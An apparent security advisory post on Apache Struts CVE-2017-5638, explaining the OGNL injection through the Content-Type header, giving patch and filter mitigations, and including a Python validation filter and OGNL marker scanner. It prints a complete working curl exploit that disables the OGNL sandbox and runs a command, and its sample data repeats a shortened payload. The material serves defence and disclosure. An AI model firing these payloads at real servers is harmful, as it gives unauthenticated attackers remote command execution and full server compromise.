Apache Struts, Remote Code Execution, CVE-2017-5638 (Critical)


CVE-2017-5638 (Apache advisory S2-045) is an OGNL injection in the Jakarta Multipart parser of Apache Struts 2. Struts hands a request to that parser whenever its `Content-Type` header contains `multipart/form-data`. If the header cannot then be parsed as a valid multipart type, the parser builds an error message that embeds the raw header value, and that message is passed through Struts' localized-text lookup (`LocalizedTextUtil.findText`), which evaluates any Object-Graph Navigation Language (OGNL) expression (`%{...}`) it finds in the text. An attacker therefore places an OGNL expression in the `Content-Type` header itself: the failed parse triggers the error path and the expression is evaluated on the server. Because OGNL can reach arbitrary Java classes such as `java.lang.ProcessBuilder`, an unauthenticated remote attacker gets arbitrary command execution with the privileges of the servlet container running Struts, from a single HTTP request to any action and without a real file upload. A follow-up advisory (S2-046) showed the same flaw is also reachable through the `Content-Disposition` filename and `Content-Length` headers; the fixed releases cover both paths.
Platform: Apache Struts 2
Version: 2.3.5 – 2.3.31, 2.5 – 2.5.10 (fixed in 2.3.32 and 2.5.10.1)
Vulnerability: Remote Code Execution (OGNL injection via HTTP header)
Severity: Critical

date: 2017-03-07

Prediction: Patch Available

What Undercode Says:

The public proof-of-concept below disables the OGNL sandbox (`_memberAccess`), runs `id` (or `cmd.exe /c id` on Windows) and streams the command output straight into the HTTP response body, so a successful hit is visible in the reply:

```bash
curl -H "Content-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='id').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}" http://target-host.com/struts2-endpoint
```

How the Exploit Works:

Malicious HTTP Request: a single request to any Struts 2 action, no authentication or real upload needed

Crafted Content-Type Header: the value contains `multipart/form-data` (so the multipart parser is invoked) but is not a valid media type

OGNL Expression Injection: the parser's error message embeds the header value, and the localized-text lookup evaluates the `%{...}` expression inside it

Arbitrary Command Execution: the expression spawns a process (`ProcessBuilder`) with the privileges of the servlet container

Protection from this CVE:

Apply Official Patch: upgrade to Struts 2.3.32 or 2.5.10.1, which contain the fix for both the S2-045 and S2-046 paths

Upgrade Struts Version: if still on a 2.3.x or 2.5.x release in the affected ranges, treat the upgrade as urgent; exploitation was seen in the wild within days of disclosure

Use Input Validation: until the upgrade lands, front the application with a servlet filter that rejects any request whose `Content-Type` contains `multipart/form-data` but is not a well-formed multipart header (the workaround given in the Apache advisory), or switch to a different multipart parser implementation

Web Application Firewall: block `%{`, `${` and other OGNL tokens in request headers as defence in depth, but do not rely on it alone, since payloads can be reshaped to evade pattern rules
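As an added illustration (not code from this page, from Undercode, or from the Apache Struts project), the following Python models the decision the S2-045 workaround filter makes and adds a marker scan for hunting in captured headers. It assumes, as Struts' `Dispatcher` does, that a request reaches the Jakarta multipart parser only when its `Content-Type` contains `multipart/form-data`, so only such headers need the strict check; the 512-byte cap, the allowed parameter set and the sample requests (client IPs, paths, headers) are constructed for the example.

```python
"""Content-Type validation in the spirit of the S2-045 workaround filter,
plus an OGNL marker scan for hunting.  Illustrative Python, not Struts code;
a production filter would be a Java javax.servlet.Filter in front of Struts."""
import re

# Struts' Dispatcher hands a request to the multipart parser only when the
# Content-Type header *contains* this substring, so only such headers can
# reach the vulnerable error-message path.
MULTIPART_TRIGGER = "multipart/form-data"

# Conservative grammar (assumption for this example, tighter than RFC 7231):
# type/subtype, then optional ';name=value' or ';name="value"' parameters.
_MEDIA_TYPE_RE = re.compile(r"^[a-z0-9.+-]+/[a-z0-9.+-]+$")
_PARAM_RE = re.compile(r'^([a-z0-9-]+)=(?:"([^"]*)"|([^\s;"]*))$', re.IGNORECASE)
# RFC 2046 boundary alphabet (space allowed inside a quoted value), 1-70 chars.
_BOUNDARY_RE = re.compile(r"^[A-Za-z0-9'()+_,./:=? -]{1,70}$")
_ALLOWED_PARAMS = {"boundary", "charset"}   # example policy, not a Struts setting
_MAX_HEADER_LEN = 512                        # example policy

# Fragments that appear in public OGNL payloads; used for hunting, not blocking.
OGNL_MARKERS = ("%{", "${", "_memberAccess", "ognl.OgnlContext",
                "@java.lang", "ProcessBuilder", "getRuntime(")


def parse_content_type(value):
    """Split 'type/subtype; p=v; ...' into (media_type, {param: value}).
    Returns None when any piece violates the conservative grammar above."""
    if len(value) > _MAX_HEADER_LEN:
        return None
    pieces = [p.strip() for p in value.split(";")]
    media = pieces[0].lower()
    if not _MEDIA_TYPE_RE.match(media):
        return None
    params = {}
    for piece in pieces[1:]:
        if not piece:               # tolerate a trailing ';'
            continue
        m = _PARAM_RE.match(piece)
        if not m:
            return None
        name = m.group(1).lower()
        if name in params:          # a duplicated parameter is never legitimate
            return None
        params[name] = m.group(2) if m.group(2) is not None else m.group(3)
    return media, params


def is_well_formed_multipart(value):
    """True only for a strictly well-formed multipart/form-data header with a
    sane boundary and no parameters outside the allowed set."""
    parsed = parse_content_type(value)
    if parsed is None:
        return False
    media, params = parsed
    if media != MULTIPART_TRIGGER:
        return False
    boundary = params.get("boundary")
    if boundary is None or not _BOUNDARY_RE.match(boundary):
        return False
    return set(params) <= _ALLOWED_PARAMS


def should_block(content_type):
    """Filter decision for one request.  Headers that would not engage the
    multipart parser are left alone; those that would must be strictly
    well-formed, which no OGNL payload (it needs '%{' or '${') can be."""
    if content_type is None:
        return False
    if MULTIPART_TRIGGER not in content_type.lower():
        return False
    return not is_well_formed_multipart(content_type)


def ognl_markers(header_value):
    """Hunting aid: which known OGNL payload fragments appear in a header."""
    return [m for m in OGNL_MARKERS if m in header_value]


# Constructed sample of captured request headers: (client, path, Content-Type).
SAMPLE_REQUESTS = [
    ("10.0.0.5", "/upload.action",
     "multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW"),
    ("10.0.0.6", "/api/items", "application/json; charset=utf-8"),
    ("203.0.113.9", "/struts2-showcase/index.action",
     "%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)"
     ".(#cmd='id').(#p=new java.lang.ProcessBuilder({'/bin/bash','-c',#cmd}))"
     ".(#p.start())}"),
    ("203.0.113.10", "/index.action", "multipart/form-data; boundary=a; x=${1+1}"),
]


def triage(requests=SAMPLE_REQUESTS):
    """Return [(client, path, markers)] for every request the filter would block."""
    return [(client, path, ognl_markers(ct))
            for client, path, ct in requests if should_block(ct)]


if __name__ == "__main__":
    for client, path, markers in triage():
        print("BLOCK", client, path, markers)
```

The two legitimate requests in the sample pass untouched (the JSON one never engages the multipart parser, the browser upload is well-formed), while the S2-045 payload and the header smuggling a `${...}` parameter are both blocked; the marker list is only there to enrich the alert, the block decision rests on the strict grammar, which is why obfuscated payloads cannot slip past it the way they can past a pattern-only WAF rule.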

Impact:

Full Server Compromise

Data Theft

Service Disruption

Arbitrary Code Execution


Sources:

Reported By: nvd.nist.gov
